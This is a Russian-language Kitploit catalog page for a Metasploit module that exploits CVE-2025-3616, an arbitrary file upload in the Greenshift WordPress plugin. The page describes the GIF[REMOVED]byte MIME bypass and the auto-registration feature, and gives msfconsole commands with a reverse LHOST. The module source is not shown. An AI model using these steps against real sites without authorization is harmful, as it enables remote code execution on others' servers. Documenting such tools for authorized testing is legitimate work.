Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3616 — Модуль Metasploit, эксплуатирующий произвольную загрузку файлов в плагине Greenshift WordPress (CVE-2025-3616) для достижения RCE через подделку MIME, с автоматической регистрацией и извлечением nonce. | Kitploit
Инструменты/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияРазработка Полезной Нагрузки
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Модуль Metasploit, эксплуатирующий произвольную загрузку файлов в плагине Greenshift WordPress (CVE-2025-3616) для достижения RCE через подделку MIME, с автоматической регистрацией и извлечением nonce.

Репозиторий
128 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Metasploit-модуль: Greenshift WordPress Plugin Arbitrary File Upload (CVE-2025-3616)

Этот репозиторий содержит Metasploit-модуль для эксплуатации CVE-2025-3616 — уязвимости произвольной загрузки файлов в плагине Greenshift для WordPress (версии с 11.4 по 11.4.5).

Эксплойт позволяет аутентифицированным пользователям (Subscriber+) загружать произвольные файлы, что приводит к удалённому выполнению кода (RCE). Он обходит проверку типа файлов в плагине, подделывая MIME-тип с помощью GIF-магических байтов (GIF89a;).

Возможности

  • Обработка аутентификации: поддерживает вход с существующими учётными данными (USERNAME/PASSWORD).
  • Авторегистрация: включает опцию REGISTER для автоматической регистрации нового пользователя и эксплуатации уязвимости с использованием свежих сессионных cookie (полезно, если на целевом сайте включена регистрация).
  • Извлечение nonce: автоматически извлекает требуемый nonce wp_rest из административной панели.
  • Обход защиты: добавляет GIF-магические байты к PHP-пейлоаду, чтобы обойти проверку finfo_file().

Установка

  1. Убедитесь, что у вас установлен Metasploit Framework.

  2. Скопируйте wp_greenshift_file_upload.rb в каталог локальных модулей:

    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. Запустите msfconsole и перезагрузите модули:

    msfconsole
    msf6 > reload_all
    

Использование

1. Использование авторегистрации (рекомендуется)

Если на целевом сайте включена регистрация пользователей, учётные данные не нужны.

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. Использование существующих учётных данных

Если у вас уже есть действительный пользователь (Subscriber или выше):

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

Параметры

ПараметрОбязательныйОписание
RHOSTSдаАдрес целевого хоста
LHOSTдаАдрес прослушивания (ваш IP)
REGISTERнетУстановите true, чтобы автоматически зарегистрировать новую учётную запись (по умолчанию: false)
USERNAMEнетИмя пользователя WordPress (обязательно, если REGISTER установлен в false)
PASSWORDнетПароль WordPress (обязательно, если REGISTER установлен в false)
EMAILнетEmail для регистрации (необязательно, генерируется автоматически, если пусто)

Отказ от ответственности

Этот модуль предназначен только для образовательных целей и авторизованного тестирования на проникновение. Использование этого кода для атак на цели без предварительного взаимного согласия незаконно.

Скачать инструмент